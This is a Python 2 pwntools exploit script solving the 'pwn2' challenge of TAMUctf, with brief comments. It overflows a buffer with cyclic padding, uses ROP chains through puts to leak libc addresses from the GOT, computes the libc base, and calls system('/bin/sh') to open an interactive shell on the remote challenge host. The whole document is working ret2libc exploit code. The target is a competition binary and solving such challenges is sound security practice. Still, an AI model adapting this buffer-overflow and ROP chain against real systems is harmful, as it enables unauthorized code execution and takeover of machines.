```
#!/bin/python

#Exploit for pwn2 in TAMUctf

from pwn import *

DEBUG = False

binary = "pwn2"
libc_loc = "libc.so.6" #Found the libc to shell, saved time later on.
libc = None
host, port = "pwn.ctf.tamu.edu",4322

e = ELF(binary)

p = None

gdbscript = "b *0x80485f5\n"
gdbscript += "c\n"

if DEBUG:
p = process(binary)
libc = ELF("/lib32/libc.so.6")
gdb.attach(p.pid, gdbscript)
else:
libc = ELF(libc_loc)
p = remote(host, port)

pad_sz = 0xf3
tag = "tagg"
padding = cyclic(pad_sz)

rop = flat([
e.plt['puts'],
0x0804862e, #Print something and reenter function, so we know something happened.
e.got['puts']
])

payload = padding + rop + "tagg"

p.sendline(payload)

#First leak
print p.recvuntil(tag + "\n") #Newline from puts
puts = unpack(p.recv(4))
print "puts:", hex(puts)
print "Remaining data...", p.recv()

#Need two leaks to determine libc.
rop = flat([
e.plt['puts'],
0x0804862e, #Print something and reenter function, so we know something happened.
e.got['setvbuf']
])

payload = padding + rop + tag

#Second leak
p.sendline(payload)
print p.recvuntil(tag + "\n") #Newline from puts
setvbuf = unpack(p.recv(4))
print "setvbuf:", hex(setvbuf)

#Use the leaks to shell.
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']

rop = flat([
system,
0x0804862e,
libc_base + libc.search("/bin/sh\x00").next()
])

payload = padding + rop + tag

#Shell
p.sendline(payload)
p.interactive()
```